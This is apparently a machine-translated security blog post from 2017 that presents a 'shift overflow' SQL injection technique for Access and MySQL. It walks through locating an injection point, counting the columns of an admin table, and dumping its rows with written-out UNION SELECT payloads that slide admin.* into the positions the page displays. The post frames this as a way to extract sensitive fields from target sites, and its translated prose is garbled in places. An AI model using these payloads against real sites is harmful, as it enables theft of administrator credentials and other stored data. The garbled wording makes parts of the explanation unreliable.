SQL Injection Shift Overflow

safety Pulse 2017-03-01 16:59

Introduced:

When an Access database type is injected, we do not get the column name (provided that there is a table name), we will generally choose to use offset injection, but this injection is often aided by the personal character, and cumbersome steps. In this paper, we study a new injection technique to make "offset injection no longer required personality". The injection technique is defined here as: "Shift-overflow technology".

It works with access and MySQL (any version)

Body:

Let's take a look at the normal offset injection steps:

1. Determine the injection point

2.order by Judging length

3. Judge the name of the table

4. Joint queries

5. Get the number of columns in the table: union select 1,2,3,4,.., * FROM table

6. Start offset Injection: table as a INNER join table as B on a.id=b.id

Since the method of step 6 is too much of a character value and the statement is cumbersome, here we study the new injection technique:

First take a look at the overall meaning of step 6 statements:

The statement of Step 6, Talbe 2 aliases, and then use the alias to query the contents of talbe (Table A and Table B), and on a.id = b.id Such conditions are to meet the requirements of the syntax, the actual does not work, because the same content of the table, the same field content must be the same.

At this point, we look back at step 5:

Because the purpose of adding numbers after select in a federated query is to match the number of columns returned by the union query to the results returned by the normal query of the site (the inconsistent database will error, the page cannot be displayed), and the * represents a wildcard that can represent all the columns of the entire table; To replace all columns in the table so that the union query can be completed and the value of the * is calculated.

At this point we continue to study the overall formula of offset injection, and found that even the use of multistage offset injection requires a certain probability (personality value) to get the desired results, so we try to study the new method can not replace the method of the non-fixed probability.

Now let's reorganize the SQL statement, starting with the federated query:

1. Original UNION statement: Union SELECT,.., P..,n from TABLE

(p= page Burst numbers, there may be multiple p1,p2.) ; n= the total number of columns of the original web site query; talbe= the name of the table we obtained; Use the definition of the above letter from the beginning)

2. New statement:

Union Select,.., p-1,table.*,p+k,.., n from TABLE where field name = Field Contents

--Burst the contents of the first field in the Talbe table in P's position (other locations may also have more content)

(here if there is a known field name can be used, there is no, the General ID This field exists, you can use the id = one to display the first line)

Union Select,.., p-2,table.*,p+k-1,.., n from TABLE where field name = Field Contents

--Burst the contents of the second field in the Talbe table in P's position (other locations may also have more content)

Union Select,.., p-3,table.*,p+k-2,.., n from TABLE where field name = Field Contents

--Burst the contents of the third field in the Talbe table in P's position (other locations may also have more content)

Note: This must be talbe.* and not *

3.1 And so on can burst talbe each column content.

3.2 If P<k is unable to burst the contents of p+1 column to K column, if n-p<k cannot burst the 1th column to K (n-p) column.

Principle:

1. From the original statement: Union select,.., p..,n-k,* from TABLE can be concluded that the purpose of the union query is to construct the same number of columns of the original site query structure, so that the page can display the corresponding number This statement is equivalent to doing two queries and merging their results, making the first select N-k from Talbe, making a SELECT * from Talbe the second time, and then merging their results.

This can refer to the MySQL statement: select 1,2,3,4,5,admin.* from admin;

2. As long as the requirements of principle 1, to ensure that the results of the joint query and the original site query results in the same number of columns, so you can move the talbe.* forward to the page display of the number to burst the contents of the Talbe column.

This can refer to the MySQL statement:

Select 1,2,3,4,5,6,7,8,9,10 from news where ID =1 Union select 1,2,3,4,5,6,7,admin.* from admin;

Select 1,2,3,4,5,6,7,8,9,10 from news where ID =1 Union select 1,2,3,admin.*,7,8,9,10 from admin;

Note: Assume that the number 4, 5 is displayed on the page.

From the know, in fact, the data is nearly query out, but the page is not displayed, this is by panning query results to the page display of the number up, you can burst sensitive fields

Example:

Step 1: Determine if the injection point exists

Step 2: Determine the field length: Order by 35

Step 3: Get the table name (prerequisites) and exists (SELECT * from admin)

Step 4: Get the column name (after you try multiple characters commonly used segment names, you eventually find that you can't get the field names)

Step 5: Use a federated query (Union Select)

Step 6: Using the new injection technology method

(1) Gets the number of columns in the admin table:

UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,* from Admin--Return error page

UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,* from Admin--Return error page

UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,* from admin-- Return error page

UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,* from admin-- Return error page

UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,* from admin--returns to the Step 5 page, So the admin table has a number of 6 columns

(2) Because the page contains consecutive numbers, indicating that continuous query results can be displayed, construct the SQL statement query the first four columns of row one.

UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,admin.*,34,35 from admin

(3) The first column of the first row is 1, so you can guess that the table has an ID field, so the Modify statement gets the other rows.

UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,admin.*,34,35 from admin where ID = 3

Summarize

Here we name this new injection technique as "shift overflow". This method can also be injected if MySQL is less than 5.0 in the same condition as access, and if it is a version of MySQL greater than 5.0, use this method to eliminate the step of getting a column name.

"Mister House Security Defense Lab MST. Lab @ Seagull Security Pulse account issued reprint please indicate the source of security pulse "

"Science and technology, is a focus on account security, enterprise risk assessment of technology-based enterprises." It has a cloud-based and self-research product multi-factor token, an Internet Password Disclosure query based SaaS Service platform, plug-based primary passive multi-scan enterprise-level vulnerability detection cloud platform. 】

"Safety pulse: share technology, enjoy quality." The article only represents the author's views, if there are different views, welcome to add the security pulse Number: Secpulse, for communication. 】

SQL Injection Shift Overflow